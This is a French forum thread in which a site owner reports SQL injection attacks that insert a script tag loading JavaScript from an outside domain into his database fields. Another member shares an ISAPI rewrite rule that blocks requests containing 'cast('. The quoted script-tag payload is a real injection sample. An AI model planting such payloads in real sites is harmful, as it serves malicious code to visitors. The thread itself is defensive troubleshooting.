tbbuim1
Messages postés940Date d'inscriptionjeudi 20 février 2003StatutMembreDernière intervention 3 février 2011
-
2 juin 2008 à 16:24
TompouceTN
Messages postés1Date d'inscriptionvendredi 30 janvier 2004StatutMembreDernière intervention11 juin 2008
-
11 juin 2008 à 10:16
Bonjour à tous,
Comme des millions de serveurs dans le monde, mon serveur est attaqué par des injections de SQL : du style
<script src=http://www.redir94.com/b.js></script> à l'intérieur de mes champs dans la base de données.
TompouceTN
Messages postés1Date d'inscriptionvendredi 30 janvier 2004StatutMembreDernière intervention11 juin 2008 11 juin 2008 à 10:16
Bonjour,
J'ai eu le même soucis pendant quelques jours.
Pour me débarrasser des attaques, j'ai utilisé une règle de réécriture (avec ISAPI Rewrite), demandant de stopper le chargement de la page si on détecte "cast(" dans le querystring.
RewriteRule .*CAST\(.* . [F,I] Depuis, plus de soucis.
Cela n'empèche pas de sécuriser au maximum les requètes. Chez moi aussi, il y avait du boulot... certaines pages étant écrites depuis presque 10 ans... !